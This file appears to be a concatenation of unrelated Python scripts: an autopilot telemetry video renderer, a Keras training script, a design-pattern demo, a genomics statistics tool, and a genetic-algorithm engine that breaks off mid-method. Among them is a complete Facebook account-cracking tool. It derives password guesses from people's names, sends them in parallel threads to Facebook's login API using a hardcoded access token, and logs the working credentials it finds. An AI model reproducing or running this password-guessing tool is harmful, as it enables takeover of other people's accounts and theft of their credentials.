inputParser = argparse.ArgumentParser(description='Render telemetry (attitude) to video from Anemoi autopilot')
inputParser.add_argument('sessionFolder', nargs=1, help='folder containing processed autopilot autopilot (30 FPS)')
inputArgs = inputParser.parse_args()
def processInput() :
print inputArgs.sessionFolder
scriptDir = os.path.dirname(os.path.abspath(__file__))
os.system("touch /run/shm/attitude2video_opencv.lock")
data_yaw=[]
data_pitch=[]
data_roll=[]
data_speed=[]
data_altitude=[]
data_climb=[]
sourceFile_yaw = open(inputArgs.sessionFolder[0]+"/logs/interpolated_yaw_30fps.txt", 'r')
for line in sourceFile_yaw :
data_yaw.append(float(line))
sourceFile_yaw.close()
sourceFile_pitch = open(inputArgs.sessionFolder[0]+"/logs/interpolated_pitch_30fps.txt", 'r')
for line in sourceFile_pitch :
data_pitch.append(float(line))
sourceFile_pitch.close()
sourceFile_roll = open(inputArgs.sessionFolder[0]+"/logs/interpolated_roll_30fps.txt", 'r')
for line in sourceFile_roll :
data_roll.append(float(line))
sourceFile_roll.close()
sourceFile_speed = open(inputArgs.sessionFolder[0]+"/logs/interpolated_speed_30fps.txt", 'r')
for line in sourceFile_speed :
data_speed.append(float(line)*3600/1000)
sourceFile_speed.close()
sourceFile_altitude = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_30fps.txt", 'r')
for line in sourceFile_altitude :
data_altitude.append(float(line))
sourceFile_altitude.close()
sourceFile_climb = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_speed_30fps.txt", 'r')
for line in sourceFile_climb :
data_climb.append(float(line))
sourceFile_climb.close()
# create working directory in shared memmory
if not os.path.exists("/dev/shm/attitude2video_opencv") :
os.makedirs("/dev/shm/attitude2video_opencv")
# prepare image templates
os.system("cp "+scriptDir+"/resources_opencv/speed.png /dev/shm/attitude2video_opencv/speed.png")
os.system("cp "+scriptDir+"/resources_opencv/climb.png /dev/shm/attitude2video_opencv/climb.png")
os.system("cp "+scriptDir+"/resources_opencv/center.png /dev/shm/attitude2video_opencv/center.png")
os.system("cp "+scriptDir+"/resources_opencv/horizon.png /dev/shm/attitude2video_opencv/horizon.png")
os.system("cp "+scriptDir+"/resources_opencv/terrain.png /dev/shm/attitude2video_opencv/terrain.png")
os.system("cp "+scriptDir+"/resources_opencv/compass.png /dev/shm/attitude2video_opencv/compass.png")
os.system("cp "+scriptDir+"/resources_opencv/altitude.png /dev/shm/attitude2video_opencv/altitude.png")
os.system("cp "+scriptDir+"/resources_opencv/background.png /dev/shm/attitude2video_opencv/background.png")
# create working directory
if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work") :
os.makedirs(inputArgs.sessionFolder[0]+"/media/work")
if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") :
os.makedirs(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
## Apptly named MAGIC
# But before that, let's load the templates
originalSpeed = cv.LoadImage("/dev/shm/attitude2video_opencv/speed.png")
originalClimb = cv.LoadImage("/dev/shm/attitude2video_opencv/climb.png")
originalCenter = cv.LoadImage("/dev/shm/attitude2video_opencv/center.png")
originalHorizon = cv.LoadImage("/dev/shm/attitude2video_opencv/horizon.png") # -1 to load with alpha channel
originalTerrain = cv.LoadImage("/dev/shm/attitude2video_opencv/terrain.png")
originalCompass = cv.LoadImage("/dev/shm/attitude2video_opencv/compass.png")
originalAltitude = cv.LoadImage("/dev/shm/attitude2video_opencv/altitude.png")
for x in range(0, len(data_speed)):
progressbar(((x*1.0+1)/len(data_speed)), "Rendering openCV:", "(" + str(x+1) + "/" + str(len(data_speed)) + ") " + "attitude_%07d.jpg" % (x+1), 20)
#for x in range(0,1):
currentSpeed = cv.CloneImage(originalSpeed)
currentClimb = cv.CloneImage(originalClimb)
currentCenter = cv.CloneImage(originalCenter)
currentHorizon = cv.CloneImage(originalHorizon)
currentTerrain = cv.CloneImage(originalTerrain)
currentCompass = cv.CloneImage(originalCompass)
currentAltitude = cv.CloneImage(originalAltitude)
# 0 ------------------------------------------------
# Rotate center
picCenter = (originalHorizon.width/2.0, originalHorizon.height/2.0)
outputMatrix = cv.CreateMat(2, 3, cv.CV_32F)
cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix) # Positive number goes counter-clockwise, counter to what the original code did. Ergo, do * away with -1
cv.WarpAffine(originalHorizon, currentHorizon, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0))
# Rotate horizon
picCenter = (originalCenter.width/2.0, originalCenter.height/2.0)
outputMatrix = cv.CreateMat(2, 3, cv.CV_32F)
cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix)
cv.WarpAffine(originalCenter, currentCenter, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0))
# 1 ------------------------------------------------
odmik = data_pitch[x]*3.0*-1.0 # Reverse it again.
width = 640
height = 360
picCenter = (currentHorizon.width/2.0, currentHorizon.height/2.0);
regionOfInterest = (int(picCenter[0]-(width/2.0)), int(picCenter[1]-(height/2.0)+(odmik)), int(width), int(height))
thirdHorizon = cv.GetSubRect(currentHorizon, regionOfInterest)
# Instead of copy-ing we do subtraction. Works, since we're using (mostly) black for displaying things. Templates need to be alpha-less and inverted.
cv.Sub(thirdHorizon, originalTerrain, thirdHorizon);
cv.Sub(thirdHorizon, currentCenter, thirdHorizon);
# 2 ------------------------------------------------
zacetnaPozicija = width/2.0;
if data_yaw[x] <= 180:
zacetnaPozicija = zacetnaPozicija + 3.9*data_yaw[x]
else:
zacetnaPozicija = zacetnaPozicija + 3.9*(360-data_yaw[x])
# Speed imporvement. Which isn't faster. Yay.
compassHeight = 50
regionOfInterest = (int(currentCompass.width/2.0-zacetnaPozicija), int(0), int(width), int(compassHeight))
currentCompass = cv.GetSubRect(currentCompass, regionOfInterest)
regionOfInterest = (int(0), int(0), int(width), int(compassHeight))
pointerToSpace = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToSpace, currentCompass, pointerToSpace)
# 3 ------------------------------------------------
speedCenter = (originalSpeed.width/2.0, originalSpeed.height/2.0)
speedWidth = originalSpeed.width
speedHeight = originalSpeed.height
zacetnaPozicija = speedHeight/2.0
if data_speed[x] < 0:
zacetnaPozicija = zacetnaPozicija - 210
elif data_speed[x] >= 100:
zacetnaPozicija = zacetnaPozicija + 210
else:
zacetnaPozicija = zacetnaPozicija + (200-(data_speed[x]*4))
doDol = speedHeight - zacetnaPozicija
if (doDol > 130):
doDol = 130
doGor = zacetnaPozicija
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0), int(zacetnaPozicija-doGor), int(speedWidth), int(doDol+doGor))
currentSpeed = cv.GetSubRect(originalSpeed, regionOfInterest)
regionOfInterest = (int(width/2.0 - 190 - currentSpeed.width/2.0),
int(height/2.0 - doGor),
int(speedWidth),
int(doGor+doDol))
pointerToWhereToCopySpeed = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopySpeed, currentSpeed, pointerToWhereToCopySpeed)
# 4 ------------------------------------------------
lokalniOdmik = 0
if data_altitude[x] < 0:
lokalniOdmik = 2010
elif data_altitude[x] >= 1000:
lokalniOdmik = -2010
else:
lokalniOdmik = -(2000-(data_altitude[x]*4))
temp = currentAltitude.height / 2.0
doDol = (temp + lokalniOdmik)
if (doDol > 130):
doDol = 130
doGor = temp - lokalniOdmik
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0),
int(currentAltitude.height/2.0 - lokalniOdmik - doGor),
int(speedWidth),
int(doGor+doDol))
cutAltitude = cv.GetSubRect(currentAltitude, regionOfInterest)
regionOfInterest = (int(width/2.0 + 160), int(height/2.0 - doGor), int(70), int(doGor+doDol))
pointerToWhereToCopyAltitude = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopyAltitude, cutAltitude, pointerToWhereToCopyAltitude)
# ------------------------------------------------
lokalniOdmik = 0
if data_climb[x] < -10:
lokalniOdmik = -410
elif data_climb[x] >= 10:
lokalniOdmik = 410
else:
lokalniOdmik = ((data_climb[x]*4*10))
temp = currentClimb .height / 2.0
doDol = (temp + lokalniOdmik)
if (doDol > 130):
doDol = 130
doGor = temp - lokalniOdmik
if (doGor > 130):
doGor = 130
regionOfInterest = (int(0),
int(currentClimb.height/2.0 - lokalniOdmik - doGor),
int(speedWidth),
int(doGor+doDol))
cutClimb = cv.GetSubRect(currentClimb, regionOfInterest)
regionOfInterest = (int(width/2.0 + 245), int(height/2.0 - doGor), int(70), int(doGor+doDol))
pointerToWhereToCopyClimb = cv.GetSubRect(thirdHorizon, regionOfInterest)
cv.Sub(pointerToWhereToCopyClimb, cutClimb, pointerToWhereToCopyClimb)
# 5 ------------------------------------------------
cv.SaveImage("/dev/shm/attitude2video_opencv/composed.png", thirdHorizon)
os.system("cp /dev/shm/attitude2video_opencv/composed.png "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png" % (x+1,))
# CLEAR ALL VARIABLES! You know, memory leaks and such.
# 6 ------------------------------------------------
# KONEC
os.system("avconv -r 30 -i "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png -qscale 1 -b 1300k -vcodec libx264 "+inputArgs.sessionFolder[0]+"/media/attitude.mp4")
# remove working directory with temporary files
fileList = os.listdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
for fileName in fileList:
os.remove(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv"+"/"+fileName)
os.rmdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv")
#os.rmdir(inputArgs.sessionFolder[0]+"/media/work")
# remove working directory with temporary files in shared memmory
fileList = os.listdir("/dev/shm/attitude2video_opencv")
for fileName in fileList:
os.remove("/dev/shm/attitude2video_opencv"+"/"+fileName)
os.rmdir("/dev/shm/attitude2video_opencv")
os.system("rm -f /run/shm/attitude2video_opencv.lock")
def progressbar(progress, prefix = "", postfix = "", size = 60) :
x = int(size*progress)
sys.stdout.write("%s [%s%s] %d%% %s\r" % (prefix, "#"*x, "."*(size-x), (int)(progress*100), postfix))
sys.stdout.flush()
if __name__ == "__main__": # this is not a module
parseInput() # what do we have to do
processInput() # doing what we have to do
print "" # for estetic output
|
#!/usr/bin/env python3
# Author : Gobel
# Github : Gobel-coder
# Facebook : fb.me/fadlykaes
import os
import json
import requests
from concurrent.futures import ThreadPoolExecutor
global result,check,die
life = []
chek = []
result = 0
check = 0
die = 0
def sorting(users,cek=False):
with ThreadPoolExecutor(max_workers=30) as ex:
if not cek:
expas = input("# extra password : ")
for user in users:
users = user.split('|')
ss = users[0].split(' ')
if len(ss) == 1:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[0] + "12"
pass4 = ss[0] + "1234"
pass5 = ss[0] + "01"
pass6 = ss[0] + "123456"
elif len(ss) == 2:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[1] + "12"
pass4 = ss[1] + "1234"
pass5 = ss[0] + "123456"
pass6 = ss[0] + "01"
elif len(ss) == 3:
pass1 = ss[0] + "123"
pass2 = ss[0] + "12345"
pass3 = ss[0] + "12"
pass4 = ss[1] + "01"
pass5 = ss[1] + "12"
pass6 = ss[1] + "12345"
listpass = [
pass1,
pass2,
pass3,
pass4,
pass5,
pass6,
expas,
]
for passw in listpass:
ex.submit(login,(users[1]),(passw))
else:
for user in users:
frx = user.split("|")
ex.submit(login,(frx[0]),(frx[1]),(True))
if cek:
os.remove("results-check.txt")
os.remove("results-life.txt")
for x in life:
with open('results-life.txt','a') as f:
f.write(x+'\n')
for x in chek:
with open('results-check.txt','a') as f: f.write(x+"\n")
print("\n# Done")
print("# saved to results-check.txt results-life.txt")
elif check != 0 or result != 0:
print("\n# Done. file saved in : ")
print(" - life : results-life.txt")
print(" - checkpoint : results-check.txt")
exit("# thanks for using this tools")
else:
print("\n# Done")
exit("# no result")
def login(username,password,cek=False):
global result,check,die
b = "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32"
params = {
'access_token': b,
'format': 'JSON',
'sdk_version': '2',
'email': username,
'locale': 'en_US',
'password': password,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6', }
api = 'https://b-api.facebook.com/method/auth.login'
response = requests.get(api, params=params)
if 'session_key' in response.text and "EAAA" in response.text:
print(f"\r \033[0;m[\033[92;mLIFE\033[0;m] {username} => {password} ",end="")
print()
result += 1
if cek:
life.append(username+"|"+password)
else:
with open('results-life.txt','a') as f:
f.write(username + '|' + password + '\n')
elif 'www.facebook.com' in response.json()['error_msg']:
print(f"\r \033[0;m[\033[93;mCHEK\033[0;m] {username} => {password} ",end="")
print()
check += 1
if cek:
chek.append(username+"|"+password)
else:
with open('results-check.txt','a') as f:
f.write(username + '|' + password + '\n')
else:
die += 1
print(f"\r# life : (\033[92;m{str(result)}\033[0;m)|checkpoint : (\033[93;m{str(check)}\033[0;m)|die : ({str(die)})",end="")
|
import codecs
import os
import string
import numpy
from keras import regularizers
from keras.layers import Dense, Embedding, LSTM, CuDNNLSTM, SpatialDropout1D, Input, Bidirectional, Dropout, \
BatchNormalization, Lambda, concatenate, Flatten
from keras.models import Model
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras.initializers import Constant
from scipy import sparse
# precision recall f1-score support
#
# B 0.9445 0.9460 0.9453 56882
# M 0.6950 0.8280 0.7557 11479
# E 0.9421 0.9359 0.9390 56882
# S 0.9441 0.9061 0.9247 47490
#
# micro avg 0.9239 0.9239 0.9239 172733
# macro avg 0.8814 0.9040 0.8912 172733
# weighted avg 0.9270 0.9239 0.9249 172733
# {'mean_squared_error': 0.2586491465518497, 'mean_absolute_error': 0.27396197698378544, 'mean_absolute_percentage_error': 0.3323864857505891, 'mean_squared_logarithmic_error': 0.2666326968685906, 'squared_hinge': 0.2827528866772688, 'hinge': 0.27436352076398335, 'categorical_crossentropy': 0.3050300775957548, 'binary_crossentropy': 0.7499999871882543, 'kullback_leibler_divergence': 0.30747676168440974, 'poisson': 0.2897763648871911, 'cosine_proximity': 0.3213321868358391, 'sgd': 0.27380688950156684, 'rmsprop': 0.4363407859974404, 'adagrad': 0.5028908227192664, 'adadelta': 0.3134481079882679, 'adam': 0.342444794579377, 'adamax': 0.36860069757644914, 'nadam': 0.39635284171196516}
words = []
with codecs.open('plain/actor_dic.utf8', 'r', encoding='utf8') as fa:
lines = fa.readlines()
lines = [line.strip() for line in lines]
words.extend(lines)
rxwdict = dict(zip(words,range(1, 1+len(words))))
rxwdict['\n'] =0
rydict = dict(zip(list("ABCDEFZ"), range(len("ABCDEFZ"))))
ytick = [0,18,32,263.5,1346,2321,244001]
def getYClass(y):
r = 0
for i in range(len(ytick)):
if int(y) >= ytick[i]:
return r
else:
r+=1
assert r<len(ytick), (y,r)
return r
batch_size = 20
nFeatures = 5
seqlen = 225#85
totallen = nFeatures+seqlen
word_size = 11
actors_size = 8380
Hidden = 150
Regularization = 1e-4
Dropoutrate = 0.2
learningrate = 0.2
Marginlossdiscount = 0.2
nState = 7
EPOCHS = 60
modelfile = os.path.basename(__file__).split(".")[0]
loss = "squared_hinge"
optimizer = "nadam"
sequence = Input(shape=(totallen,))
seqsa= Lambda(lambda x: x[:, 0:nFeatures])(sequence)
seqsb = Lambda(lambda x: x[:, nFeatures:])(sequence)
network_emb = sparse.load_npz("model/weibo_wembedding.npz").todense()
embedded = Embedding(len(words) + 1, word_size, embeddings_initializer=Constant(network_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb)
networkcore_emb = sparse.load_npz("model/weibo_coreembedding.npz").todense()
embeddedc = Embedding(len(words) + 1, actors_size, embeddings_initializer=Constant(networkcore_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb)
concat = concatenate([embedded, embeddedc])
# dropout = Dropout(Dropoutrate)(embedded)
dropout = SpatialDropout1D(rate=Dropoutrate)(concat)
# blstm = Bidirectional(LSTM(Hidden, dropout=Dropoutrate, recurrent_dropout=Dropoutrate, return_sequences=False), merge_mode='sum')(dropout)
blstm = Bidirectional(CuDNNLSTM(Hidden, return_sequences=False), merge_mode='sum')(dropout)
concat = concatenate([seqsa, blstm])
# dropout = Dropout(Dropoutrate)(blstm)
batchNorm = BatchNormalization()(concat)
dense = Dense(nState, activation='softmax', kernel_regularizer=regularizers.l2(Regularization))(batchNorm)
model = Model(input=sequence, output=dense)
model.compile(loss=loss, optimizer=optimizer, metrics=["accuracy"])
model.summary()
# model.save("keras/B20-E60-F1-PU-L-Bn-De.h5")
MODE = 1
if MODE == 1:
with codecs.open('plain/movie_sentiments.utf8', 'r', encoding='utf8') as fs:
with codecs.open('plain/movie_years.utf8', 'r', encoding='utf8') as fy:
with codecs.open('weibo_dic/movie_ndic.utf8', 'r', encoding='utf8') as fd:
with codecs.open('plain/movie_actornames.utf8', 'r', encoding='utf8') as fa:
with codecs.open('plain/movie_states.utf8', 'r', encoding='utf8') as ff:
ylines = fy.readlines()
slines = fs.readlines()
alines = fa.readlines()
dlines = fd.readlines()
flines = ff.readlines()
assert len(dlines) == len(alines) and len(alines) == len(slines) and len(slines) == len(ylines) and len(flines) == len(ylines)
X = []
print('process X list.')
counter = 0
for i in range(len(dlines)):
item = []
item.append(ylines[i].strip())
item.extend(slines[i].strip().split(','))
item = [int(i) for i in item] # year, p, n
item.append(item[1] + item[2]) # total
item.append(item[1] / item[2] if item[2] != 0 else 0) # PN-ratio
anames = alines[i].strip().split(',')
item.extend([rxwdict.get(name, 0) for name in anames])
# pad right '\n'
#print(len(item))
item.extend([0]*(totallen - len(item)))
assert len(item) == totallen,(len(item))
X.append(item)
if counter % 10000 == 0 and counter != 0:
print('.')
X = numpy.array(X)
print(X.shape)
y=[]
print('process y list.')
for line in flines:
line = line.strip()
yi = numpy.zeros((len("ABCDEFZ")), dtype=int)
yi[getYClass(line)] = 1
y.append(yi)
y = numpy.array(y)
print(y.shape)
history = model.fit(X, y, batch_size=batch_size, nb_epoch=EPOCHS, verbose=1)
model.save("keras/%s.h5"%modelfile)
print('FIN')
if MODE == 2:
STATES = list("BMES")
with codecs.open('plain/pku_test.utf8', 'r', encoding='utf8') as ft:
with codecs.open('baseline/pku_test_B20-E60-F1-PU-L-Bn-De_states.txt', 'w', encoding='utf8') as fl:
model = load_model("keras/B20-E60-F1-PU-L-Bn-De.h5")
model.summary()
xlines = ft.readlines()
X = []
print('process X list.')
counter = 0
for line in xlines:
line = line.replace(" ", "").strip()
# X.append([getFeaturesDict(line, i) for i in range(len(line))])
X.append([rxdict.get(e, 0) for e in list(line)])
counter += 1
if counter % 1000 == 0 and counter != 0:
print('.')
print(len(X))
X = pad_sequences(X, maxlen=maxlen, padding='pre', value=0)
print(len(X), X.shape)
yp = model.predict(X)
print(yp.shape)
for i in range(yp.shape[0]):
sl = yp[i]
lens = len(xlines[i].strip())
for s in sl[-lens:]:
i = numpy.argmax(s)
fl.write(STATES[i])
fl.write('\n')
print('FIN')
# for sl in yp:
# for s in sl:
# i = numpy.argmax(s)
# fl.write(STATES[i])
# fl.write('\n')
# print('FIN')
|
# py3.8
###########################################################
# #
# 运输 #
# #
###########################################################
class Transport(object):
def deliver(self):
raise NotImplementedError
class Truck(Transport):
def deliver(self):
print("Truck: deliver")
class Ship(Transport):
def deliver(self):
print("Ship: deliver")
###########################################################
# #
# 物流 #
# #
###########################################################
class Logistics(object):
def planDelivery(self):
transport = self.createTransport()
transport.deliver()
def createTransport(self) -> Transport:
raise NotImplementedError
class RoadLogistics(Logistics):
def createTransport(self) -> Transport:
return Truck()
class SeaLogistics(Logistics):
def createTransport(self) -> Transport:
return Ship()
if __name__ == '__main__':
road_logistics = RoadLogistics()
road_logistics.planDelivery()
print("page074")
|
##########################################################
### Import Necessary Modules
import argparse #provides options at the command line
import sys #take command line arguments and uses it in the script
import gzip #allows gzipped files to be read
import re #allows regular expressions to be used
##########################################################
### Command-line Arguments
parser = argparse.ArgumentParser(description="A script to partition individuals form a rolling window statistic script (VCF.stats.windowBased.v1.0.py)")
parser.add_argument("-file", help = "The statistic file", default=sys.stdin, required=True)
parser.add_argument("-ind", help = "The list of individuals seperated by a comma (no spaces), default = NA", default="NA")
parser.add_argument("-avg", help = "Find the average for individuals and only return that (doesn't output the header and format is for circos plot), default = no, option = yes", default="no")
parser.add_argument("-out", help = "If finding the average, what field? default=count, options=depth, het, mis", default="count")
parser.add_argument("-win", help = "What was the window size used to generate data? default=10000", default=10000)
parser.add_argument("-chr", help = "Keep the chromosomes in the following comma delimited list (no spaces) and convert to number. default=no", default="no")
args = parser.parse_args()
#########################################################
### Variables
class OpenFile():
def __init__ (self, f, typ, fnum):
"""Opens a file (gzipped) accepted"""
if re.search(".gz$", f):
self.filename = gzip.open(f, 'rb')
else:
self.filename = open(f, 'r')
if typ == "file":
if int(fnum) == 1:
sys.stderr.write("\n\tOpened stats file: {}\n\n".format(f))
ReadFile(self.filename,fnum,f)
class ReadFile():
def __init__ (self, f, fnum, fname):
self.openFile = f
self.keep = args.ind.split(",")
self.header = "NA"
self.total = {}
self.count = {}
if re.search(".gz$", fname):
self.header = self.openFile.readline().decode('utf-8').rstrip('\n')
else:
self.header = self.openFile.readline().rstrip('\n')
if args.avg == "no":
print("{}".format(self.header))
for line in self.openFile:
try:
line = line.decode('utf-8')
except:
pass
line = line.rstrip('\n')
self.ind, self.mis, self.hRef, self.Het, self.hAlt, self.aDepth, self.window, self.scaffold = line.split()
if self.ind in self.keep:
if args.avg == "no":
print("{}".format(line))
else:
self.value = "NA"
if args.out == "count":
self.value = int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt)
elif args.out == "depth":
try:
self.value = float(self.aDepth)
except:
self.value = "NA"
elif args.out == "het":
self.value = int(self.Het)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt))
elif args.out == "mis":
self.value = int(self.mis)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt))
if self.value != "NA":
if self.scaffold in self.total:
if self.window in self.total[self.scaffold]:
self.total[self.scaffold][self.window] += self.value
self.count[self.scaffold][self.window] += 1
else:
self.total[self.scaffold][self.window] = self.value
self.count[self.scaffold][self.window] = 1
else:
self.total[self.scaffold] = {}
self.count[self.scaffold] = {}
self.total[self.scaffold][self.window] = self.value
self.count[self.scaffold][self.window] = 1
if args.avg == "yes":
for self.scaffold in sorted(self.total):
for self.window in sorted(self.total[self.scaffold], key = int):
if args.chr == "no":
print ("{}\t{}\t{}\t{}".format(self.scaffold, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window])))
else:
self.allChroms = args.chr.split(",")
for self.chrNum, self.chr in enumerate(self.allChroms):
if self.chr == self.scaffold:
print ("{}\t{}\t{}\t{}".format(int(self.chrNum) + 1, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window])))
if __name__ == '__main__':
open_file = OpenFile(args.file, "file", 1)
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.evolve.simplega This module contains the GA Engine, the GA Engine class is responsible
# for all the evolutionary process. It contains the GA Engine related
# functions, like the Termination Criteria functions for convergence analysis, etc.
#
# Default Parameters:
#*Number of Generations*
# Default is 100 generations
#*Mutation Rate*
# Default is 0.02, which represents 2%
#*Crossover Rate*
# Default is 0.9, which represents 90%
#*Elitism Replacement*
# Default is 1 individual
#*Population Size*
# Default is 80 individuals
#*Minimax*
# >>> constants.minimaxType["maximize"]
# Maximize the evaluation function
#*DB Adapter*
# Default is **None**
#*Migration Adapter*
# Default is **None**
#*Interactive Mode*
# Default is **True**
#*Selector (Selection Method)*
# :func:`Selectors.GRankSelector`
# The Rank Selection method
#
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import division, print_function
# Import standard modules
import numpy as np
from time import time
from types import BooleanType
from sys import stdout as sys_stdout
# Import other evolve modules
from population import GPopulation
from functionslot import FunctionSlot
from genome import GenomeBase
from dbadapters import DBBaseAdapter
import constants
import utils
# Import the relevant PTS classes and modules
from ..core.tools.logging import log
from ..core.tools import serialization
from ..core.tools.random import prng
# -----------------------------------------------------------------
def RawScoreCriteria(ga_engine):
"""
Terminate the evolution using the **bestrawscore** and **rounddecimal**
parameter obtained from the individual
Example:
>>> genome.setParams(bestrawscore=0.00, rounddecimal=2)
(...)
>>> ga_engine.terminationCriteria.set(GSimpleGA.RawScoreCriteria)
"""
ind = ga_engine.bestIndividual()
bestRawScore = ind.getParam("bestrawscore")
roundDecimal = ind.getParam("rounddecimal")
if bestRawScore is None:
utils.raiseException("you must specify the bestrawscore parameter", ValueError)
if ga_engine.getMinimax() == constants.minimaxType["maximize"]:
if roundDecimal is not None:
return round(bestRawScore, roundDecimal) <= round(ind.score, roundDecimal)
else:
return bestRawScore <= ind.score
else:
if roundDecimal is not None:
return round(bestRawScore, roundDecimal) >= round(ind.score, roundDecimal)
else:
return bestRawScore >= ind.score
# -----------------------------------------------------------------
def ConvergenceCriteria(ga_engine):
"""
Terminate the evolution when the population have converged
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
"""
pop = ga_engine.get_population()
return pop[0] == pop[len(pop) - 1]
# -----------------------------------------------------------------
def RawStatsCriteria(ga_engine):
""" Terminate the evolution based on the raw stats
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.RawStatsCriteria)
"""
stats = ga_engine.getStatistics()
if stats["rawMax"] == stats["rawMin"]:
if stats["rawAve"] == stats["rawMax"]:
return True
return False
# -----------------------------------------------------------------
def FitnessStatsCriteria(ga_engine):
""" Terminate the evoltion based on the fitness stats
Example:
>>> ga_engine.terminationCriteria.set(GSimpleGA.FitnessStatsCriteria)
"""
stats = ga_engine.getStatistics()
if stats["fitMax"] == stats["fitMin"]:
if stats["fitAve"] == stats["fitMax"]:
return True
return False
# -----------------------------------------------------------------
class GAEngine(object):
"""
This class represents the Genetic Algorithm Engine
Example:
>>> ga = GAEngine(genome)
>>> ga.selector.set(Selectors.GRouletteWheel)
>>> ga.setGenerations(120)
>>> ga.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
:param genome: the :term:`Sample Genome`
:param interactiveMode: this flag enables the Interactive Mode, the default is True
.. note:: if you use the same random seed, all the runs of algorithm will be the same
"""
selector = None
""" This is the function slot for the selection method
if you want to change the default selector, you must do this: ::
ga_engine.selector.set(Selectors.GRouletteWheel) """
stepCallback = None
""" This is the :term:`step callback function` slot,
if you want to set the function, you must do this: ::
def your_func(ga_engine):
# Here you have access to the GA Engine
return False
ga_engine.stepCallback.set(your_func)
now *"your_func"* will be called every generation.
When this function returns True, the GA Engine will stop the evolution and show
a warning, if False, the evolution continues.
"""
terminationCriteria = None
""" This is the termination criteria slot, if you want to set one
termination criteria, you must do this: ::
ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
Now, when you run your GA, it will stop when the population converges.
There are those termination criteria functions: :func:`GSimpleGA.RawScoreCriteria`,
:func:`GSimpleGA.ConvergenceCriteria`, :func:`GSimpleGA.RawStatsCriteria`, :func:`GSimpleGA.FitnessStatsCriteria`
But you can create your own termination function, this function receives
one parameter which is the GA Engine, follows an example: ::
def ConvergenceCriteria(ga_engine):
pop = ga_engine.get_population()
return pop[0] == pop[len(pop)-1]
When this function returns True, the GA Engine will stop the evolution and show
a warning, if False, the evolution continues, this function is called every
generation.
"""
def __init__(self, genome, interactiveMode=True):
""" Initializator of GSimpleGA """
#if seed is not None: random.seed(seed) # used to be like this
if type(interactiveMode) != BooleanType:
utils.raiseException("Interactive Mode option must be True or False", TypeError)
if not isinstance(genome, GenomeBase):
utils.raiseException("The genome must be a GenomeBase subclass", TypeError)
self.internalPop = GPopulation(genome)
self.nGenerations = constants.CDefGAGenerations
self.pMutation = constants.CDefGAMutationRate
self.pCrossover = constants.CDefGACrossoverRate
self.nElitismReplacement = constants.CDefGAElitismReplacement
self.setPopulationSize(constants.CDefGAPopulationSize)
self.minimax = constants.minimaxType["maximize"]
self.elitism = True
# NEW
self.new_population = None
# Adapters
self.dbAdapter = None
self.migrationAdapter = None
self.time_init = None
self.max_time = None
self.interactiveMode = interactiveMode
self.interactiveGen = -1
self.GPMode = False
self.selector = FunctionSlot("Selector")
self.stepCallback = FunctionSlot("Generation Step Callback")
self.terminationCriteria = FunctionSlot("Termination Criteria")
self.selector.set(constants.CDefGASelector)
self.allSlots = (self.selector, self.stepCallback, self.terminationCriteria)
self.internalParams = {}
self.currentGeneration = 0
# GP Testing
for classes in constants.CDefGPGenomes:
if isinstance(self.internalPop.oneSelfGenome, classes):
self.setGPMode(True)
break
log.debug("A GA Engine was created, nGenerations=%d", self.nGenerations)
# New
self.path = None
# -----------------------------------------------------------------
@classmethod
def from_file(cls, path):
"""
This function ...
:param path:
:return:
"""
# Inform the user
log.info("Loading the genetic algorithm engine from '" + path + "' ...")
# Load the GA object from file
ga = serialization.load(path)
# Set the path of the GA file
ga.path = path
# Return the GA
return ga
# -----------------------------------------------------------------
def save(self):
"""
This function ...
:return:
"""
# Save to the current path
self.saveto(self.path)
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
# Inform the user
log.info("Saving the genetic algorithm engine to '" + path + "' ...")
# Set the new path as the current path and save
self.path = path
serialization.dump(self, path, protocol=2)
# -----------------------------------------------------------------
def setGPMode(self, bool_value):
"""
Sets the Genetic Programming mode of the GA Engine
:param bool_value: True or False
"""
